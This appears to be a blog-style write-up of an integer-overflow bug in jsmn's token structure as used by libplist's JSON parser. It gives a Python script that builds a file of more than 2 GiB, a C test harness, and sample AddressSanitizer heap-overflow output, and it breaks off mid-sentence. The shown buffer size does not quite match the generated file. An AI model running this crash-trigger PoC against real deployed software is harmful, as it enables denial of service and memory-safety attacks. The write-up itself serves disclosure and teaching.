Integer Overflow Vulnerability In JSON Parsing
Hey guys! Let's dive into a potentially nasty bug that can rear its head when parsing JSON data, specifically within the jsmntok_t structure. This structure is a crucial component in how JSON tokens are described, and a sneaky integer overflow can lead to some serious issues. We'll explore the problem, see how it's triggered, and discuss a fix. This is super important because it can lead to crashes and other security vulnerabilities in applications that process JSON, so pay close attention.
The Problem: Integer Overflow in jsmntok_t
At the heart of the issue lies the jsmntok_t structure. This structure is used to represent tokens within a JSON document. Think of it as a detailed description of each piece of the JSON, like the start and end positions of strings, numbers, and other data types. The structure's definition looks something like this (simplified for clarity):
typedef struct {
    jsmntype_t type;
    int start;
    int end;
    int size;
#ifdef JSMN_PARENT_LINKS
    int parent;
#endif
} jsmntok_t;
Notice that start, end, and size are all declared as int. This is where the trouble begins. On most platforms int is 32 bits wide, so it can only hold values from -2,147,483,648 to 2,147,483,647. A JSON document larger than about 2 GiB contains byte offsets beyond that range. When such an offset is stored in start or end, it no longer fits, and in practice the value wraps around to a negative number or to a much smaller positive one. (Strictly speaking, signed overflow in C arithmetic is undefined behavior, so the language guarantees nothing here.) Code that later uses these fields computes wrong lengths and accesses memory outside the buffer, which results in crashes or, worse, security vulnerabilities. This is a classic example of how a seemingly small choice of data type can affect the security and stability of a whole system: your types have to cover the full range of values the program can encounter.
Imagine a JSON document that contains a very long string value. If the end position of that string lies past the maximum value of an int, the stored end value is wrong: just past the limit it comes out negative, and after a full 2^32 wrap it comes out as a small positive number. When the program later uses this end value to locate the string, it can read from an invalid memory location, which leads to a crash or may even let an attacker read sensitive information. Understanding the limits of your data types and anticipating overflow scenarios is a critical part of secure coding. It is also a key reason why many libraries use size_t or a similar unsigned type for sizes and offsets: on a 64-bit system size_t can index any buffer that fits in memory, which greatly reduces the risk of this kind of overflow.
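To make the wraparound concrete, here is a minimal Python sketch of what typically happens when an offset is squeezed into a 32-bit signed int. The helper name wrap_int32 is made up for this illustration, and the code models the common two's-complement behavior rather than anything the C standard promises.

```python
INT32_MAX = 2**31 - 1


def wrap_int32(value: int) -> int:
    """Keep the low 32 bits of value and reinterpret them as a signed 32-bit int.

    This models typical two's-complement truncation; it is an illustration,
    not a statement about what any particular C compiler must do.
    """
    value &= 0xFFFFFFFF
    return value - 2**32 if value > INT32_MAX else value


# Offsets at the limit, just past it, and past a full 2**32 wrap.
for offset in (INT32_MAX, INT32_MAX + 1, 2**31 + 30, 2**32 + 5):
    print(f"{offset:>12} -> {wrap_int32(offset):>12}")
```

The last value shows the "small positive number" case: an offset a little over 4 GiB comes back looking like a perfectly ordinary offset near the start of the buffer.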
Triggering the Overflow: Proof of Concept (PoC)
Let's get practical and look at how we can trigger this integer overflow. I'll show you a Python script that crafts a JSON file designed to expose the vulnerability. Here's a simplified version of the Python code:
def stream_write_with_chars(prefix, suffix, char, count, output_file):
    """Write prefix, then char repeated count times, then suffix to output_file."""
    if not isinstance(count, int) or count < 0:
        raise ValueError("count must be a non-negative integer")
    with open(output_file, 'w', encoding='utf-8') as f:
        f.write(prefix)
        # Write the filler in small chunks so the 2 GiB string is never held in memory.
        chunk_size = 1024
        remaining = count
        while remaining > 0:
            write_size = min(remaining, chunk_size)
            f.write(char * write_size)
            remaining -= write_size
        f.write(suffix)
    print(f"Successfully wrote to file: {output_file}")
    print(f"Content structure: prefix({len(prefix)} characters) + {count} '{char}' characters + suffix({len(suffix)} characters)")


if __name__ == "__main__":
    prefix = '''{ "Name'''
    suffix = '''": "Alice", "Age": 20 }'''
    insert_char = "a"
    char_count = 0x80000000  # 2^31 characters
    output_filename = "6.json"
    try:
        stream_write_with_chars(prefix, suffix, insert_char, char_count, output_filename)
    except Exception as e:
        print(f"An error occurred: {e}")
This script generates the JSON file. The key is char_count, which is set to 0x80000000 (2^31), one more than the largest value a signed 32-bit integer can hold. The output is a prefix, 2^31 'a' characters, and a suffix, so the first key in the object becomes a string just over 2 GiB long. That is enough to push the end value of its jsmntok_t past the limit of an int. When the vulnerable C code parses this file, the overflow occurs as soon as it records the position or computes the length of that string.
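You can check the numbers without writing 2 GiB to disk. The sketch below recomputes the layout of the generated file. It assumes the usual jsmn convention that a string token's start is the index just after the opening quote and its end is the index of the closing quote; the function name key_token_offsets is made up for this illustration.

```python
PREFIX = '{ "Name'
SUFFIX = '": "Alice", "Age": 20 }'
FILL_COUNT = 0x80000000  # same value as char_count in the generator script
INT32_MAX = 2**31 - 1


def key_token_offsets(prefix: str, fill_count: int) -> tuple[int, int]:
    """Return (start, end) of the oversized key string.

    Assumption: start is the index after the opening quote and end is the
    index of the closing quote, which is the first character of the suffix.
    """
    start = prefix.index('"') + 1
    end = len(prefix) + fill_count
    return start, end


start, end = key_token_offsets(PREFIX, FILL_COUNT)
total_size = len(PREFIX) + FILL_COUNT + len(SUFFIX)

print(f"file size : {total_size} bytes")
print(f"key start : {start}")
print(f"key end   : {end} (fits in int: {end <= INT32_MAX})")
print(f"key length: {end - start}")
```

Under that assumption the start offset is tiny, but the end offset lands a few bytes past INT32_MAX, so it is the end field that cannot be represented.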
Now, let's look at the C code, which is designed to parse the generated JSON file:
#include <stdio.h>
#include <stdint.h>
#include <stdlib.h>
#include <string.h>
#include <plist/plist.h>

/* Redundant if the installed <plist/plist.h> already declares it. */
plist_err_t plist_from_json(const char *json, uint32_t length, plist_t *plist);

int main(int argc, char **argv)
{
    if (argc < 2) {
        fprintf(stderr, "Usage: %s <json-plist-file>\n", argv[0]);
        return 1;
    }
    const char *filename = argv[1];
    FILE *fp = fopen(filename, "rb");
    if (!fp) { perror("fopen"); return 1; }

    /* Determine the file size, then read the whole file into memory. */
    fseek(fp, 0, SEEK_END);
    long size = ftell(fp);
    fseek(fp, 0, SEEK_SET);
    if (size <= 0) { fprintf(stderr, "File is empty or invalid size\n"); fclose(fp); return 1; }
    char *buffer = malloc(size + 1);
    if (!buffer) { perror("malloc"); fclose(fp); return 1; }
    if (fread(buffer, 1, (size_t)size, fp) != (size_t)size) {
        fprintf(stderr, "Short read\n");
        free(buffer);
        fclose(fp);
        return 1;
    }
    buffer[size] = '\0';
    fclose(fp);

    /* Parse the JSON; this is where the oversized string is tokenized. */
    plist_t root = NULL;
    plist_err_t err = plist_from_json(buffer, (uint32_t)size, &root);
    if (err != PLIST_ERR_SUCCESS || !root) {
        fprintf(stderr, "❌ plist_from_json() failed: %d\n", err);
        free(buffer);
        return 1;
    }
    printf("✅ Parsed JSON plist successfully!\n");

    /* On success, dump the parsed tree as XML. */
    char *xml = NULL;
    uint32_t length = 0;
    plist_to_xml(root, &xml, &length);
    if (xml) { printf("\n=== Converted to XML ===\n%s\n", xml); free(xml); }
    plist_free(root);
    free(buffer);
    return 0;
}
This C code reads the JSON file into a heap buffer and calls plist_from_json to parse it. The parsing happens inside plist_from_json, and that is where the integer overflow is triggered when the parser reaches the long string. If parsing succeeds, plist_to_xml converts the result to XML and the program prints it. With the file generated by the Python script, you should not expect to get that far: the start, end, or size values of the oversized token no longer describe the string correctly, so the failure usually shows up during parsing or conversion.
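One detail worth checking is the (uint32_t)size cast in the harness, because it might look like the culprit. The short sketch below uses Python's ctypes fixed-width types to compare the two conversions for a file of 2^31 + 30 bytes, which is the size the generator script produces. It only illustrates integer ranges and does not call into the parser.

```python
import ctypes

# Size of the PoC file: 7-byte prefix + 2**31 filler bytes + 23-byte suffix.
file_size = 7 + 2**31 + 23

# ctypes integer types do no overflow checking; they keep the low 32 bits.
as_uint32 = ctypes.c_uint32(file_size).value
as_int32 = ctypes.c_int32(file_size).value

print(f"as uint32_t: {as_uint32}")
print(f"as int     : {as_int32}")
```

The length survives the trip through uint32_t unchanged, so the parser really is handed the whole buffer. The value only stops making sense once it has to live in a 32-bit signed field such as the ones in jsmntok_t.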
Observed Result
When we run the vulnerable C code with the JSON file created by the Python script, we'll see an error message, likely indicating a crash or a heap-buffer-overflow. This is because the values used to represent the start and end positions of the oversized string are no longer correct due to the integer overflow. Here is an example of the kind of output you might see:
AddressSanitizer: heap-buffer-overflow ...
READ of size 1 ...
0x7fa4606fb81c is located 0 bytes to the right of 2147483676-byte region ...
SUMMARY: AddressSanitizer: heap-buffer-overflow in unescape_string
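AddressSanitizer (or a similar tool) detects the attempt to read from an invalid memory location and reports it as a heap-buffer-overflow. In this trace the one-byte read happens in unescape_string, immediately past the end of a 2,147,483,676-byte heap region. This is a clear indication that something went wrong during parsing, and it is consistent with the parser working from token offsets that no longer describe the string. The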